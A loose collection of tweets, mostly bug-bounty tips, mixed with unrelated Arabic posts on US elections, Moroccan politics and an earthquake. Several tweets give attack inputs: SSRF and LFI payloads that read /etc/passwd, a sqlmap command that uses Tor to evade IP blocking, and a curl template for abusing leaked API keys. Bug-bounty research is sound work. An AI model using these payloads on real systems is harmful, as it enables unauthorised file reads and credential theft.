تقليد يعود إلى 180 عامًا.. لماذا ينتخب الأميركيون رؤساءهم في الثلاثاء الأول من شهر نوفمبر؟ #قناة_الغد #ترمب #بايدن #أميركا #هاريس #الانتخابات_الأميركية

أنا مغربي محرج ومستاء من تطبيع دولتي مع الكيان الصهيوني

We just released a post on certifications: "The Certification Trap" Make sure you check it out! https://t.co/mUKiyCozNV

First Sql Injection on BMW prg ..thank u @GodfatherOrwa for the motivation you're the man +Tip: dorking is the key to find juicy endpoints #bugbountytip #bugbounty

Another P1 using @GodfatherOrwa tip: - Found default IIS BLUE page - Run tool shortscan for iis - Found endpoint like : target~.zip - run fuzz and found zip file with a web.config file leaking creds .Leads to Admin dashboard takeover. #bugbountytip

Been Preparing for the OSCP using notion to track my progress, and wanted to share this template if anyone needs it , feel free to DM me #OSCP #Offensivesecurity #BugBounty #offsec

Today a weird endpoint was found doing recursive fuzzing with fuff :/css/trace.axd --> leaking users sessions #bugbountytips

Does gittools extractor still works for yofor extracting .git files . @GodfatherOrwa #bugbountytip #bugbounty

Strong aftershock activity may occur in/near #Morocco. Pay attention! #earthquake.

SSRF Payloads for LFR/LFD file:/etc/passwd%3F/ file:/etc%252Fpasswd/ file:/etc%252Fpasswd%3F/ file:///etc/%3F/../passwd file:${br}/et${u}c%252Fpas${te}swd%3F/ file:$(br)/et$(u)c%252Fpas$(te)swd%3F/ SSRF POLYGLOT file:///etc/passwd?/../passwd by @brutelogic #infosec #cybersec

The last secret keys I found lately impact & exploitation Algolia: curl -X GET \ -H "X-Algolia-API-Key: KEY" \ -H "X-Algolia-Application-Id: APPID" \ " https://t.co/Bhd75ErikN" #BugBounty #bugbounty #bugbountytips #bugbountytips #Bugcrowd 👇👇

I finally got ffuf to output to a text file in a decent way for automation: ffuf -w /tmp/wordlists.txt -u URL/FUZZ -r -ac -v &>> /tmp/output.txt ; sed -i 's/\:\: Progress.*Errors.*\:\://g' /tmp/output.txt ; sed -i 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g' /tmp/output.txt #bugbountytips

LFI Trick: /fileRead.jsp?fileName=/etc/passwd (406📛) /fileRead.jsp?fileName=/?tc/?asswd (200✅) /fileRead.jsp?fileName=/??c/??sswd (200✅) #infosec #bugbountytips #BugBounty

bypass blocking IP, in sqlmap, i found SQL injection in normal scan my IP was blocked I used tor to send a request and I bypassed this issue sqlmap -r 1 --time-sec=10 --tor --tor-type=SOCKS5 --check-tor if not work change time-sec or use proxy list #bugbounty #bugbountytips

Here i found a P1 , - “_wpeprivate” check this directory , Here , lot of sensitive data 😅 - “_wpeprivate”. ——-> 302, #bugbounty #bug #bugbountytips

بعد حفظ الروابط الان نحتاج إلى فلترة النتائج المستخرجة والاكتفاء فقط بملفات الجافا سكربت باستخدام الأمر التالي: cat test.txt| grep -aEo 'https?://[^ ]+' | sed 's/]$//' | sort -u| grep -aEi "\.(js)" اول أمر قراءة الملف بعدها جمع الروابط وفلترة بامتداد الملف

Sharing a blog post containing some of my collaborative work around exploiting Wordpress Plugin 0/N-days across multiple programs to score some nice bounties - https://t.co/0nCWYdUda1 #BugBounty #Security

Always cool seeing new tools from @pdiscoveryio https://t.co/L3ocBG3iij

Shopify disclosed a bug submitted by 0x50d: https://t.co/cS1JXPZZWA - Bounty: $2,900 #hackerone #bugbounty

Just created a really basic Go tool that goes through a list of subdomains and tells you which ones resolve to internal IPv4 addresses. Useful for escalating SSRF vulns. https://t.co/BPuFvq1M5j